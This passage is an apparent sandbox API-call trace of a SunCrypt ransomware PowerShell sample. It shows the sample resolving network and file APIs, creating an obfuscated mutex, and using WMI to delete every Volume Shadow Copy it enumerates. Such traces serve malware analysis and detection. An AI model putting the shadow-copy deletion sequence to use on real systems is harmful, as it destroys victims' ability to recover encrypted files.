ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, 
ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.702] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.702] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.705] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701752158794) returned 1 [0104.705] EtwEventActivityIdControl () returned 0x0 [0104.705] EtwEventActivityIdControl () returned 0x0 [0104.705] EtwEventActivityIdControl () returned 0x0 [0104.705] EtwEventActivityIdControl () returned 0x0 [0104.787] EnumDesktopsW (hwinsta=0x0, lpEnumFunc=0x41e0000, lParam=0x44d0000) [0104.789] GetProcAddress (hModule=0x76040000, lpProcName="GetModuleHandleA") returned 0x7608d9f3 [0104.790] GetModuleHandleA (lpModuleName=0x0) returned 0xd80000 [0104.790] GetProcAddress (hModule=0x76040000, lpProcName="VirtualQuery") returned 0x76096d4f [0104.790] GetProcAddress (hModule=0x76040000, lpProcName="VirtualAlloc") returned 0x7608c53a [0104.790] GetProcAddress (hModule=0x76040000, lpProcName="GetCurrentProcess") returned 0x7608d8a0 [0104.790] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x776d0000 [0104.791] GetProcAddress (hModule=0x776d0000, lpProcName="ZwUnmapViewOfSection") returned 0x777169b8 [0104.791] VirtualQuery (in: lpAddress=0xd80000, lpBuffer=0x4ebece4, dwLength=0x1c | out: lpBuffer=0x4ebece4*(BaseAddress=0xd80000, AllocationBase=0xd80000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) 
returned 0x1c [0104.791] VirtualQuery (in: lpAddress=0xd81000, lpBuffer=0x4ebece4, dwLength=0x1c | out: lpBuffer=0x4ebece4*(BaseAddress=0xd81000, AllocationBase=0xd80000, AllocationProtect=0x80, RegionSize=0xe000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0104.791] VirtualQuery (in: lpAddress=0xd8f000, lpBuffer=0x4ebece4, dwLength=0x1c | out: lpBuffer=0x4ebece4*(BaseAddress=0xd8f000, AllocationBase=0xd80000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0104.791] VirtualQuery (in: lpAddress=0xd90000, lpBuffer=0x4ebece4, dwLength=0x1c | out: lpBuffer=0x4ebece4*(BaseAddress=0xd90000, AllocationBase=0xd80000, AllocationProtect=0x80, RegionSize=0x5b000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0104.791] VirtualQuery (in: lpAddress=0xdeb000, lpBuffer=0x4ebece4, dwLength=0x1c | out: lpBuffer=0x4ebece4*(BaseAddress=0xdeb000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x5000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0104.791] VirtualAlloc (lpAddress=0x400000, dwSize=0x14001, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0104.791] VirtualAlloc (lpAddress=0x0, dwSize=0x14001, flAllocationType=0x3000, flProtect=0x4) returned 0x44f0000 [0104.793] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x75720000 [0104.794] GetProcAddress (hModule=0x75720000, lpProcName="GetUserNameExA") returned 0x75749cc9 [0104.794] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x765e0000 [0106.676] GetProcAddress (hModule=0x765e0000, lpProcName="InternetReadFile") returned 0x765fb406 [0106.676] GetProcAddress (hModule=0x765e0000, lpProcName="HttpOpenRequestA") returned 0x76604c7d [0106.676] GetProcAddress (hModule=0x765e0000, lpProcName="InternetCloseHandle") returned 0x765fab49 [0106.677] GetProcAddress (hModule=0x765e0000, lpProcName="InternetOpenA") returned 0x7660f18e [0106.677] GetProcAddress (hModule=0x765e0000, lpProcName="HttpQueryInfoA") returned 0x765fa33e 
[0106.677] GetProcAddress (hModule=0x765e0000, lpProcName="HttpSendRequestA") returned 0x766718f8 [0106.677] GetProcAddress (hModule=0x765e0000, lpProcName="InternetConnectA") returned 0x766049e9 [0106.678] GetProcAddress (hModule=0x765e0000, lpProcName="InternetCrackUrlA") returned 0x765ed075 [0106.678] GetProcAddress (hModule=0x765e0000, lpProcName="HttpAddRequestHeadersA") returned 0x765fdcd2 [0106.678] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75fa0000 [0106.678] GetProcAddress (hModule=0x75fa0000, lpProcName="wnsprintfW") returned 0x75fcef87 [0106.679] GetProcAddress (hModule=0x75fa0000, lpProcName="PathFindExtensionW") returned 0x75fba1b9 [0106.679] GetProcAddress (hModule=0x75fa0000, lpProcName="wnsprintfA") returned 0x75fcedae [0106.679] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x725c0000 [0106.825] GetProcAddress (hModule=0x725c0000, lpProcName="WNetCloseEnum") returned 0x725c2dd6 [0106.825] GetProcAddress (hModule=0x725c0000, lpProcName="WNetEnumResourceW") returned 0x725c3058 [0106.826] GetProcAddress (hModule=0x725c0000, lpProcName="WNetOpenEnumW") returned 0x725c2f06 [0106.826] GetProcAddress (hModule=0x725c0000, lpProcName="WNetGetConnectionW") returned 0x725c42d7 [0106.827] GetProcAddress (hModule=0x725c0000, lpProcName="WNetAddConnection2W") returned 0x725c4744 [0106.827] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76040000 [0106.828] GetProcAddress (hModule=0x76040000, lpProcName="ExitProcess") returned 0x7609bd12 [0106.828] GetProcAddress (hModule=0x76040000, lpProcName="GetLastError") returned 0x7608cee0 [0106.828] GetProcAddress (hModule=0x76040000, lpProcName="AllocConsole") returned 0x760ecc2d [0106.829] GetProcAddress (hModule=0x76040000, lpProcName="GetCurrentProcess") returned 0x7608d8a0 [0106.829] GetProcAddress (hModule=0x76040000, lpProcName="GetVolumePathNamesForVolumeNameW") returned 0x7607c071 [0106.829] GetProcAddress (hModule=0x76040000, lpProcName="SetVolumeMountPointW") returned 0x760d5f88 [0106.830] 
GetProcAddress (hModule=0x76040000, lpProcName="FindVolumeClose") returned 0x76072d86 [0106.830] GetProcAddress (hModule=0x76040000, lpProcName="FindNextVolumeW") returned 0x76072999 [0106.830] GetProcAddress (hModule=0x76040000, lpProcName="FindFirstVolumeW") returned 0x76072c45 [0106.830] GetProcAddress (hModule=0x76040000, lpProcName="GetVersionExW") returned 0x76089af9 [0106.831] GetProcAddress (hModule=0x76040000, lpProcName="GetComputerNameExA") returned 0x760d0177 [0106.831] GetProcAddress (hModule=0x76040000, lpProcName="GetCommandLineW") returned 0x76095414 [0106.831] GetProcAddress (hModule=0x76040000, lpProcName="GetModuleHandleA") returned 0x7608d9f3 [0106.832] GetProcAddress (hModule=0x76040000, lpProcName="CreateMutexA") returned 0x7608d8d4 [0106.832] GetProcAddress (hModule=0x76040000, lpProcName="LocalFree") returned 0x7608ccfc [0106.832] GetProcAddress (hModule=0x76040000, lpProcName="FindNextFileW") returned 0x76089ca6 [0106.833] GetProcAddress (hModule=0x76040000, lpProcName="FindFirstFileW") returned 0x7609415c [0106.833] GetProcAddress (hModule=0x76040000, lpProcName="CreateFileW") returned 0x7608e9a9 [0106.833] GetProcAddress (hModule=0x76040000, lpProcName="GetDriveTypeW") returned 0x7608ee42 [0106.833] GetProcAddress (hModule=0x76040000, lpProcName="lstrlenW") returned 0x7608bef8 [0106.834] GetProcAddress (hModule=0x76040000, lpProcName="InterlockedIncrement") returned 0x7608c4b0 [0106.834] GetProcAddress (hModule=0x76040000, lpProcName="InterlockedCompareExchange64") returned 0x77705b1c [0106.834] GetProcAddress (hModule=0x76040000, lpProcName="HeapAlloc") returned 0x77722dd6 [0106.834] GetProcAddress (hModule=0x76040000, lpProcName="HeapFree") returned 0x7608c4c0 [0106.834] GetProcAddress (hModule=0x76040000, lpProcName="GetProcessHeap") returned 0x7608fddd [0106.835] GetProcAddress (hModule=0x76040000, lpProcName="GetQueuedCompletionStatus") returned 0x76074f98 [0106.835] GetProcAddress (hModule=0x76040000, lpProcName="Sleep") returned 
0x7608c366 [0106.835] GetProcAddress (hModule=0x76040000, lpProcName="WriteFile") returned 0x760954fe [0106.835] GetProcAddress (hModule=0x76040000, lpProcName="ReadFile") returned 0x76089cbe [0106.836] GetProcAddress (hModule=0x76040000, lpProcName="CloseHandle") returned 0x7608e96c [0106.836] GetProcAddress (hModule=0x76040000, lpProcName="lstrcatW") returned 0x760a67ec [0106.836] GetProcAddress (hModule=0x76040000, lpProcName="GetProcAddress") returned 0x7608cd94 [0106.836] GetProcAddress (hModule=0x76040000, lpProcName="GetFileType") returned 0x76096bc4 [0106.836] GetProcAddress (hModule=0x76040000, lpProcName="GetStdHandle") returned 0x76098fa7 [0106.837] GetProcAddress (hModule=0x76040000, lpProcName="LoadLibraryA") returned 0x7608dd65 [0106.837] GetProcAddress (hModule=0x76040000, lpProcName="MultiByteToWideChar") returned 0x7608f007 [0106.837] GetProcAddress (hModule=0x76040000, lpProcName="WideCharToMultiByte") returned 0x7608effa [0106.837] GetProcAddress (hModule=0x76040000, lpProcName="FillConsoleOutputCharacterA") returned 0x760edcdb [0106.837] GetProcAddress (hModule=0x76040000, lpProcName="FillConsoleOutputAttribute") returned 0x760a26f0 [0106.838] GetProcAddress (hModule=0x76040000, lpProcName="GetConsoleMode") returned 0x7609c240 [0106.838] GetProcAddress (hModule=0x76040000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76089c08 [0106.838] GetProcAddress (hModule=0x76040000, lpProcName="SetConsoleScreenBufferSize") returned 0x760ee820 [0106.838] GetProcAddress (hModule=0x76040000, lpProcName="SetConsoleCursorPosition") returned 0x76071edc [0106.839] GetProcAddress (hModule=0x76040000, lpProcName="SetConsoleTextAttribute") returned 0x760a2685 [0106.839] GetProcAddress (hModule=0x76040000, lpProcName="lstrcpyW") returned 0x7607921f [0106.839] GetProcAddress (hModule=0x76040000, lpProcName="AttachConsole") returned 0x760eccfb [0106.839] GetProcAddress (hModule=0x76040000, lpProcName="WriteConsoleW") returned 0x7608868d [0106.839] GetProcAddress 
(hModule=0x76040000, lpProcName="GetConsoleOutputCP") returned 0x760951ab [0106.840] GetProcAddress (hModule=0x76040000, lpProcName="CreateThread") returned 0x7608ddc2 [0106.840] GetProcAddress (hModule=0x76040000, lpProcName="CreateIoCompletionPort") returned 0x76078fe1 [0106.840] GetProcAddress (hModule=0x76040000, lpProcName="PostQueuedCompletionStatus") returned 0x76074fb0 [0106.840] GetProcAddress (hModule=0x76040000, lpProcName="GetLogicalDrives") returned 0x760855a6 [0106.840] GetProcAddress (hModule=0x76040000, lpProcName="GetFileSizeEx") returned 0x76089b09 [0106.841] GetProcAddress (hModule=0x76040000, lpProcName="FindClose") returned 0x76094d34 [0106.841] GetProcAddress (hModule=0x76040000, lpProcName="lstrcmpW") returned 0x76095431 [0106.841] GetProcAddress (hModule=0x76040000, lpProcName="GetSystemInfo") returned 0x7608ddb2 [0106.841] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x766e0000 [0106.842] GetProcAddress (hModule=0x766e0000, lpProcName="wsprintfW") returned 0x7670426d [0106.842] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76130000 [0106.842] GetProcAddress (hModule=0x76130000, lpProcName="GetUserNameA") returned 0x7615a4b4 [0106.842] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a80000 [0106.843] GetProcAddress (hModule=0x76a80000, lpProcName="CommandLineToArgvW") returned 0x76a99ee8 [0106.843] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76480000 [0106.843] GetProcAddress (hModule=0x76480000, lpProcName="CoInitialize") returned 0x7649b636 [0106.843] GetProcAddress (hModule=0x76480000, lpProcName="CoCreateInstance") returned 0x764c9d0b [0106.844] GetProcAddress (hModule=0x76480000, lpProcName="CoSetProxyBlanket") returned 0x76495ea5 [0106.844] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x769c0000 [0106.844] GetProcAddress (hModule=0x76040000, lpProcName="VirtualProtect") returned 0x76082d25 [0106.844] VirtualProtect (in: lpAddress=0x44f0000, dwSize=0x14000, flNewProtect=0x40, 
lpflOldProtect=0x4ebed64 | out: lpflOldProtect=0x4ebed64*=0x4) returned 1 [0106.847] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x776d0000 [0106.847] GetProcAddress (hModule=0x776d0000, lpProcName="strncpy") returned 0x77705790 [0106.848] GetProcAddress (hModule=0x776d0000, lpProcName="_atoi64") returned 0x776d605a [0106.848] GetProcAddress (hModule=0x776d0000, lpProcName="atoi") returned 0x776d9d0d [0106.848] GetProcAddress (hModule=0x776d0000, lpProcName="isxdigit") returned 0x776e35f3 [0106.848] GetProcAddress (hModule=0x776d0000, lpProcName="isdigit") returned 0x776e33fb [0106.849] GetProcAddress (hModule=0x776d0000, lpProcName="memset") returned 0x77705340 [0106.849] GetProcAddress (hModule=0x776d0000, lpProcName="memcpy") returned 0x77704cc0 [0106.851] GetProcAddress (hModule=0x776d0000, lpProcName="NtSetInformationFile") returned 0x77716638 [0106.851] GetProcAddress (hModule=0x776d0000, lpProcName="NtQueryObject") returned 0x77716128 [0106.851] GetCommandLineW () returned="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -File \"C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1\" " [0106.851] CommandLineToArgvW (in: lpCmdLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -File \"C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1\" ", pNumArgs=0x4ebebac | out: pNumArgs=0x4ebebac) returned 0x4267198*="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" [0106.851] LocalFree (hMem=0x4267198) returned 0x0 [0106.852] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x776d0000 [0106.852] GetProcAddress (hModule=0x776d0000, lpProcName="RtlGetVersion") returned 0x777365e3 [0106.852] RtlGetVersion (in: lpVersionInformation=0x4501de8 | out: lpVersionInformation=0x4501de8*(dwOSVersionInfoSize=0x0, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0106.852] GetSystemInfo (in: lpSystemInfo=0x4ebeb18 | out: 
lpSystemInfo=0x4ebeb18*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0106.852] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="rrtu(t(%%%( !$p#!%#$s%tr w#w\"(! % '(&#&# t&& (u'r)&)t# !!u#(#u'p 'u$ (twrtw!%$#\x11") returned 0x4f8 [0106.852] GetLastError () returned 0x0 [0106.854] CoInitialize (pvReserved=0x0) returned 0x1 [0106.854] CoCreateInstance (in: rclsid=0x44fcf60*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x44fcec0*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0x4ebea4c | out: ppv=0x4ebea4c*=0x316718) returned 0x0 [0107.849] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76040000 [0107.850] GetProcAddress (hModule=0x76040000, lpProcName="IsWow64Process") returned 0x76085586 [0107.850] GetCurrentProcess () returned 0xffffffff [0107.850] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x4ebea30 | out: Wow64Process=0x4ebea30*=0) returned 1 [0107.850] CoCreateInstance (in: rclsid=0x44fcf50*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x4401, riid=0x44fce80*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x4ebea24 | out: ppv=0x4ebea24*=0x42907c0) returned 0x0 [0107.994] WbemLocator:IWbemLocator:ConnectServer (in: This=0x42907c0, strNetworkResource="ROOT\\cimv", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, 
pCtx=0x316718, ppNamespace=0x4ebea50 | out: ppNamespace=0x4ebea50*=0x4271938) returned 0x0 [0108.633] CoSetProxyBlanket (pProxy=0x4271938, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0108.633] IWbemServices:ExecQuery (in: This=0x4271938, strQueryLanguage="WQL", strQuery="select * from Win32_ShadowCopy", lFlags=48, pCtx=0x0, ppEnum=0x4ebea2c | out: ppEnum=0x4ebea2c*=0x309a58) returned 0x0 [0108.638] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x42f4d80, puReturned=0x4ebea68*=0x1) returned 0x0 [0111.027] IWbemClassObject:Get (in: This=0x42f4d80, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x4f30, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x4ebea14, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{37C0159D-29DA-4DA2-9244-8546939ADEE0}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0111.027] lstrlenW (lpString="{37C0159D-29DA-4DA2-9244-8546939ADEE0}") returned 38 [0111.027] GetProcessHeap () returned 0x270000 [0111.027] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0111.027] lstrlenW (lpString="{37C0159D-29DA-4DA2-9244-8546939ADEE0}") returned 38 [0111.027] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{37C0159D-29DA-4DA2-9244-8546939ADEE0}'") returned 60 [0111.028] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{37C0159D-29DA-4DA2-9244-8546939ADEE0}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0114.172] GetProcessHeap () returned 0x270000 [0114.172] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0114.172] IUnknown:Release 
(This=0x42f4d80) returned 0x0 [0114.173] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x42f4268, puReturned=0x4ebea68*=0x1) returned 0x0 [0114.176] IWbemClassObject:Get (in: This=0x42f4268, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x427092c, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{A76BD3C6-94B3-4AB6-BE07-30251811BEF7}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0114.176] lstrlenW (lpString="{A76BD3C6-94B3-4AB6-BE07-30251811BEF7}") returned 38 [0114.176] GetProcessHeap () returned 0x270000 [0114.176] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0114.176] lstrlenW (lpString="{A76BD3C6-94B3-4AB6-BE07-30251811BEF7}") returned 38 [0114.176] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{A76BD3C6-94B3-4AB6-BE07-30251811BEF7}'") returned 60 [0114.176] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{A76BD3C6-94B3-4AB6-BE07-30251811BEF7}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0117.232] GetProcessHeap () returned 0x270000 [0117.233] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0117.233] IUnknown:Release (This=0x42f4268) returned 0x0 [0117.233] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x42f4268, puReturned=0x4ebea68*=0x1) returned 0x0 [0117.234] IWbemClassObject:Get (in: This=0x42f4268, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d2574, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: 
pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{E2E64AF9-FCE7-49A1-940C-F851E8F9339B}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0117.234] lstrlenW (lpString="{E2E64AF9-FCE7-49A1-940C-F851E8F9339B}") returned 38 [0117.234] GetProcessHeap () returned 0x270000 [0117.234] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0117.234] lstrlenW (lpString="{E2E64AF9-FCE7-49A1-940C-F851E8F9339B}") returned 38 [0117.235] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{E2E64AF9-FCE7-49A1-940C-F851E8F9339B}'") returned 60 [0117.235] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{E2E64AF9-FCE7-49A1-940C-F851E8F9339B}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0120.256] GetProcessHeap () returned 0x270000 [0120.256] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0120.256] IUnknown:Release (This=0x42f4268) returned 0x0 [0120.257] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x42f4268, puReturned=0x4ebea68*=0x1) returned 0x0 [0120.259] IWbemClassObject:Get (in: This=0x42f4268, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d25fc, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{E6030CDE-F426-4EB9-A0D4-67502C04B952}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0120.259] lstrlenW (lpString="{E6030CDE-F426-4EB9-A0D4-67502C04B952}") returned 38 [0120.259] GetProcessHeap () returned 0x270000 [0120.259] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0120.259] lstrlenW 
(lpString="{E6030CDE-F426-4EB9-A0D4-67502C04B952}") returned 38 [0120.259] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{E6030CDE-F426-4EB9-A0D4-67502C04B952}'") returned 60 [0120.259] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{E6030CDE-F426-4EB9-A0D4-67502C04B952}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0123.299] GetProcessHeap () returned 0x270000 [0123.299] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0123.299] IUnknown:Release (This=0x42f4268) returned 0x0 [0123.300] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x335808, puReturned=0x4ebea68*=0x1) returned 0x0 [0123.302] IWbemClassObject:Get (in: This=0x335808, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d2574, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{AE1F5B37-D72C-40EC-8909-1366E23B77A6}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0123.302] lstrlenW (lpString="{AE1F5B37-D72C-40EC-8909-1366E23B77A6}") returned 38 [0123.302] GetProcessHeap () returned 0x270000 [0123.302] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0123.303] lstrlenW (lpString="{AE1F5B37-D72C-40EC-8909-1366E23B77A6}") returned 38 [0123.303] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{AE1F5B37-D72C-40EC-8909-1366E23B77A6}'") returned 60 [0123.303] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{AE1F5B37-D72C-40EC-8909-1366E23B77A6}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 
[0125.538] GetProcessHeap () returned 0x270000 [0125.539] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0125.539] IUnknown:Release (This=0x335808) returned 0x0 [0125.539] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x335808, puReturned=0x4ebea68*=0x1) returned 0x0 [0125.540] IWbemClassObject:Get (in: This=0x335808, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d25fc, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{AFDA9F26-24D6-4BC7-8CFE-BC3097701598}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0125.540] lstrlenW (lpString="{AFDA9F26-24D6-4BC7-8CFE-BC3097701598}") returned 38 [0125.540] GetProcessHeap () returned 0x270000 [0125.540] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0125.540] lstrlenW (lpString="{AFDA9F26-24D6-4BC7-8CFE-BC3097701598}") returned 38 [0125.540] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{AFDA9F26-24D6-4BC7-8CFE-BC3097701598}'") returned 60 [0125.541] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{AFDA9F26-24D6-4BC7-8CFE-BC3097701598}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0128.252] GetProcessHeap () returned 0x270000 [0128.252] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0128.252] IUnknown:Release (This=0x335808) returned 0x0 [0128.252] IEnumWbemClassObject:Next (in: 